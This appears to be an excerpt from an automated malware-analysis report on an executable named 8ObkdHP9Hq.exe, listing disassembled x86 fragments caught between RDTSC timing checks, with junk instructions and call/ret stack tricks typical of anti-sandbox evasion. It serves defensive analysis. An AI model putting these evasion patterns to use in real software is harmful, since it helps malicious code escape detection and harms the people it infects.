Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A4E3E7 second address: A4E432 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348062h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jnp 00007FD0B5348058h 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 popad 0x00000012 pushad 0x00000013 jo 00007FD0B534805Eh 0x00000019 jne 00007FD0B5348056h 0x0000001f pushad 0x00000020 popad 0x00000021 jmp 00007FD0B534805Ch 0x00000026 jmp 00007FD0B534805Dh 0x0000002b push eax 0x0000002c push edx 0x0000002d push eax 0x0000002e push edx 0x0000002f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: A4E432 second address: A4E436 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA208E second address: AA2094 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA2094 second address: AA20DE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 movzx edi, dx 0x0000000c push 00000000h 0x0000000e and esi, 5398E801h 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007FD0B5483368h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 0000001Bh 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 jg 00007FD0B5483366h 0x00000036 xchg eax, ebx 0x00000037 push eax 0x00000038 push edx 0x00000039 push edx 0x0000003a jbe 00007FD0B5483366h 0x00000040 pop edx 0x00000041 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA20DE second address: AA20E3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA20E3 second address: AA20E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA20E9 second address: AA20F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA2C22 second address: AA2C28 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA2C28 second address: AA2C2C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA6105 second address: AA611C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B548336Ch 0x00000008 jnc 00007FD0B5483366h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 pushad 0x00000015 popad 0x00000016 pop eax 0x00000017 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA8B89 second address: AA8B8E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA8B8E second address: AA8BB3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FD0B5483379h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA8BB3 second address: AA8C17 instructions: 0x00000000 rdtsc 0x00000002 js 00007FD0B5348063h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a nop 0x0000000b push 00000000h 0x0000000d push edx 0x0000000e call 00007FD0B5348058h 0x00000013 pop edx 0x00000014 mov dword ptr [esp+04h], edx 0x00000018 add dword ptr [esp+04h], 00000016h 0x00000020 inc edx 0x00000021 push edx 0x00000022 ret 0x00000023 pop edx 0x00000024 ret 0x00000025 push 00000000h 0x00000027 push 00000000h 0x00000029 push ecx 0x0000002a call 00007FD0B5348058h 0x0000002f pop ecx 0x00000030 mov dword ptr [esp+04h], ecx 0x00000034 add dword ptr [esp+04h], 00000019h 0x0000003c inc ecx 0x0000003d push ecx 0x0000003e ret 0x0000003f pop ecx 0x00000040 ret 0x00000041 push 00000000h 0x00000043 stc 0x00000044 push eax 0x00000045 push eax 0x00000046 push edx 0x00000047 pushad 0x00000048 pushad 0x00000049 popad 0x0000004a push eax 0x0000004b push edx 0x0000004c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA3E52 second address: AA3E58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA8C17 second address: AA8C1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA3E58 second address: AA3E5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA8DA5 second address: AA8DC9 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007FD0B5348063h 0x0000000e push eax 0x0000000f push edx 0x00000010 je 00007FD0B5348056h 0x00000016 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA3E5D second address: AA3E8B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B548336Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FD0B5483379h 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA9B03 second address: AA9B09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA9B09 second address: AA9B0F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA8E6D second address: AA8E8A instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edi 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007FD0B5348063h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA9B0F second address: AA9B13 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA9BE4 second address: AA9BEE instructions: 0x00000000 rdtsc 0x00000002 js 00007FD0B534805Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AA9CA5 second address: AA9CAA instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AABA58 second address: AABA5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AAC95B second address: AAC960 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AAC960 second address: AAC967 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AAC967 second address: AAC9E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push edx 0x0000000b call 00007FD0B5483368h 0x00000010 pop edx 0x00000011 mov dword ptr [esp+04h], edx 0x00000015 add dword ptr [esp+04h], 0000001Ah 0x0000001d inc edx 0x0000001e push edx 0x0000001f ret 0x00000020 pop edx 0x00000021 ret 0x00000022 jnc 00007FD0B5483368h 0x00000028 push 00000000h 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FD0B5483368h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000019h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 push 00000000h 0x00000046 movzx ebx, dx 0x00000049 xchg eax, esi 0x0000004a push eax 0x0000004b push edx 0x0000004c pushad 0x0000004d jmp 00007FD0B548336Dh 0x00000052 jmp 00007FD0B5483376h 0x00000057 popad 0x00000058 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AAC9E9 second address: AAC9FA instructions: 0x00000000 rdtsc 0x00000002 jng 00007FD0B5348058h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e push edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AABBAA second address: AABC48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 nop 0x00000007 or dword ptr [ebp+122D1B00h], ebx 0x0000000d push dword ptr fs:[00000000h] 0x00000014 mov dword ptr fs:[00000000h], esp 0x0000001b push 00000000h 0x0000001d push ecx 0x0000001e call 00007FD0B5483368h 0x00000023 pop ecx 0x00000024 mov dword ptr [esp+04h], ecx 0x00000028 add dword ptr [esp+04h], 00000014h 0x00000030 inc ecx 0x00000031 push ecx 0x00000032 ret 0x00000033 pop ecx 0x00000034 ret 0x00000035 mov ebx, dword ptr [ebp+122D27FAh] 0x0000003b mov eax, dword ptr [ebp+122D10D9h] 0x00000041 mov dword ptr [ebp+1244D2D8h], edi 0x00000047 xor dword ptr [ebp+122D39B3h], edi 0x0000004d push FFFFFFFFh 0x0000004f push 00000000h 0x00000051 push ebp 0x00000052 call 00007FD0B5483368h 0x00000057 pop ebp 0x00000058 mov dword ptr [esp+04h], ebp 0x0000005c add dword ptr [esp+04h], 0000001Ch 0x00000064 inc ebp 0x00000065 push ebp 0x00000066 ret 0x00000067 pop ebp 0x00000068 ret 0x00000069 movsx edi, ax 0x0000006c nop 0x0000006d jbe 00007FD0B548336Eh 0x00000073 push edx 0x00000074 jp 00007FD0B5483366h 0x0000007a pop edx 0x0000007b push eax 0x0000007c push eax 0x0000007d push edx 0x0000007e jmp 00007FD0B5483374h 0x00000083 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AADAE3 second address: AADAE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AADAE9 second address: AADAED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AADAED second address: AADB6A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FD0B5348064h 0x0000000e nop 0x0000000f mov bh, BAh 0x00000011 push 00000000h 0x00000013 push 00000000h 0x00000015 push ebx 0x00000016 call 00007FD0B5348058h 0x0000001b pop ebx 0x0000001c mov dword ptr [esp+04h], ebx 0x00000020 add dword ptr [esp+04h], 00000014h 0x00000028 inc ebx 0x00000029 push ebx 0x0000002a ret 0x0000002b pop ebx 0x0000002c ret 0x0000002d mov edi, esi 0x0000002f push edi 0x00000030 pop edi 0x00000031 push 00000000h 0x00000033 mov di, ax 0x00000036 movsx edi, ax 0x00000039 xchg eax, esi 0x0000003a pushad 0x0000003b jmp 00007FD0B534805Dh 0x00000040 jmp 00007FD0B534805Fh 0x00000045 popad 0x00000046 push eax 0x00000047 push eax 0x00000048 push edx 0x00000049 jmp 00007FD0B5348061h 0x0000004e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AAEA7B second address: AAEA81 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AAEA81 second address: AAEA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AAFB0E second address: AAFB12 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AAFB12 second address: AAFB81 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FD0B5348061h 0x0000000e pop edx 0x0000000f nop 0x00000010 push 00000000h 0x00000012 push ecx 0x00000013 call 00007FD0B5348058h 0x00000018 pop ecx 0x00000019 mov dword ptr [esp+04h], ecx 0x0000001d add dword ptr [esp+04h], 0000001Ch 0x00000025 inc ecx 0x00000026 push ecx 0x00000027 ret 0x00000028 pop ecx 0x00000029 ret 0x0000002a push 00000000h 0x0000002c clc 0x0000002d push 00000000h 0x0000002f xchg eax, esi 0x00000030 jno 00007FD0B5348067h 0x00000036 push eax 0x00000037 push eax 0x00000038 push edx 0x00000039 jmp 00007FD0B534805Fh 0x0000003e rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AADCEB second address: AADCF1 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AADE01 second address: AADE06 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB0BA7 second address: AB0BAB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB0BAB second address: AB0BB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB0BB1 second address: AB0C2B instructions: 0x00000000 rdtsc 0x00000002 jns 00007FD0B5483373h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d jc 00007FD0B548336Ch 0x00000013 mov dword ptr [ebp+122D3162h], edi 0x00000019 push 00000000h 0x0000001b cld 0x0000001c push 00000000h 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FD0B5483368h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 sub dword ptr [ebp+122D1881h], esi 0x0000003e xchg eax, esi 0x0000003f pushad 0x00000040 push edx 0x00000041 jmp 00007FD0B5483370h 0x00000046 pop edx 0x00000047 jmp 00007FD0B548336Eh 0x0000004c popad 0x0000004d push eax 0x0000004e push ebx 0x0000004f push eax 0x00000050 push edx 0x00000051 pushad 0x00000052 popad 0x00000053 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AAECC7 second address: AAED3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FD0B5348063h 0x0000000a jmp 00007FD0B534805Dh 0x0000000f popad 0x00000010 nop 0x00000011 or dword ptr [ebp+12457612h], edi 0x00000017 push dword ptr fs:[00000000h] 0x0000001e sub dword ptr [ebp+122D234Ch], edx 0x00000024 mov dword ptr fs:[00000000h], esp 0x0000002b push 00000000h 0x0000002d push ebx 0x0000002e call 00007FD0B5348058h 0x00000033 pop ebx 0x00000034 mov dword ptr [esp+04h], ebx 0x00000038 add dword ptr [esp+04h], 00000016h 0x00000040 inc ebx 0x00000041 push ebx 0x00000042 ret 0x00000043 pop ebx 0x00000044 ret 0x00000045 mov ebx, dword ptr [ebp+122D2D74h] 0x0000004b sub dword ptr [ebp+122D2016h], eax 0x00000051 mov eax, dword ptr [ebp+122D1091h] 0x00000057 add edi, 675CB583h 0x0000005d push FFFFFFFFh 0x0000005f or dword ptr [ebp+122D17E2h], esi 0x00000065 push eax 0x00000066 push ecx 0x00000067 pushad 0x00000068 push eax 0x00000069 pop eax 0x0000006a push eax 0x0000006b push edx 0x0000006c rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB3CDD second address: AB3D51 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop eax 0x00000007 nop 0x00000008 push 00000000h 0x0000000a push esi 0x0000000b call 00007FD0B5483368h 0x00000010 pop esi 0x00000011 mov dword ptr [esp+04h], esi 0x00000015 add dword ptr [esp+04h], 00000015h 0x0000001d inc esi 0x0000001e push esi 0x0000001f ret 0x00000020 pop esi 0x00000021 ret 0x00000022 call 00007FD0B548336Dh 0x00000027 sbb bl, FFFFFFF2h 0x0000002a pop ebx 0x0000002b push 00000000h 0x0000002d push 00000000h 0x0000002f push ecx 0x00000030 call 00007FD0B5483368h 0x00000035 pop ecx 0x00000036 mov dword ptr [esp+04h], ecx 0x0000003a add dword ptr [esp+04h], 00000018h 0x00000042 inc ecx 0x00000043 push ecx 0x00000044 ret 0x00000045 pop ecx 0x00000046 ret 0x00000047 stc 0x00000048 push 00000000h 0x0000004a mov ebx, 505CC5EEh 0x0000004f xchg eax, esi 0x00000050 push eax 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 jmp 00007FD0B548336Fh 0x00000059 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB3D51 second address: AB3D5B instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB3D5B second address: AB3D61 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB3D61 second address: AB3D74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jl 00007FD0B534805Ch 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB3D74 second address: AB3D78 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB3D78 second address: AB3D7D instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB0D3B second address: AB0D40 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB0D40 second address: AB0D4A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FD0B5348056h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB0E32 second address: AB0E38 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB0E38 second address: AB0E3D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB1DBD second address: AB1DC5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB1E83 second address: AB1E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AAFD39 second address: AAFD3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB2DEF second address: AB2E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B534805Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 js 00007FD0B534805Ch 0x0000000f popad 0x00000010 mov dword ptr [esp], eax 0x00000013 mov di, EC00h 0x00000017 push dword ptr fs:[00000000h] 0x0000001e push 00000000h 0x00000020 push edi 0x00000021 call 00007FD0B5348058h 0x00000026 pop edi 0x00000027 mov dword ptr [esp+04h], edi 0x0000002b add dword ptr [esp+04h], 00000018h 0x00000033 inc edi 0x00000034 push edi 0x00000035 ret 0x00000036 pop edi 0x00000037 ret 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f jmp 00007FD0B5348061h 0x00000044 mov eax, dword ptr [ebp+122D02F1h] 0x0000004a adc edi, 27E0960Ah 0x00000050 pushad 0x00000051 mov dword ptr [ebp+122D1886h], esi 0x00000057 mov edx, dword ptr [ebp+122D2C68h] 0x0000005d popad 0x0000005e push FFFFFFFFh 0x00000060 push 00000000h 0x00000062 push eax 0x00000063 call 00007FD0B5348058h 0x00000068 pop eax 0x00000069 mov dword ptr [esp+04h], eax 0x0000006d add dword ptr [esp+04h], 00000015h 0x00000075 inc eax 0x00000076 push eax 0x00000077 ret 0x00000078 pop eax 0x00000079 ret 0x0000007a mov dword ptr [ebp+1247DD93h], ecx 0x00000080 push eax 0x00000081 push eax 0x00000082 push edx 0x00000083 push eax 0x00000084 push edx 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB2E97 second address: AB2E9B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB2E9B second address: AB2EAF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348060h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB2EAF second address: AB2EB4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB5DD3 second address: AB5E1C instructions: 0x00000000 rdtsc 0x00000002 jg 00007FD0B5348056h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop ebx 0x0000000b mov dword ptr [esp], eax 0x0000000e xor edi, 63A4AEA8h 0x00000014 ja 00007FD0B534805Ch 0x0000001a push 00000000h 0x0000001c movzx edi, cx 0x0000001f push 00000000h 0x00000021 mov edi, dword ptr [ebp+122D2BC0h] 0x00000027 xchg eax, esi 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007FD0B5348069h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB5E1C second address: AB5E40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5483371h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jnc 00007FD0B548336Ch 0x00000012 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AB5030 second address: AB5034 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: ABF5EC second address: ABF5F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: ABF5F0 second address: ABF5F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: ABF8A4 second address: ABF8B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 push edi 0x00000008 pop edi 0x00000009 jg 00007FD0B5483366h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: ABF8B3 second address: ABF8DC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FD0B5348062h 0x00000007 jmp 00007FD0B534805Ch 0x0000000c pop edx 0x0000000d pop eax 0x0000000e popad 0x0000000f push ecx 0x00000010 pushad 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: ABF8DC second address: ABF8E2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\8ObkdHP9Hq.exe RDTSC instruction interceptor: First address: AC3782 second address: AC3790 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
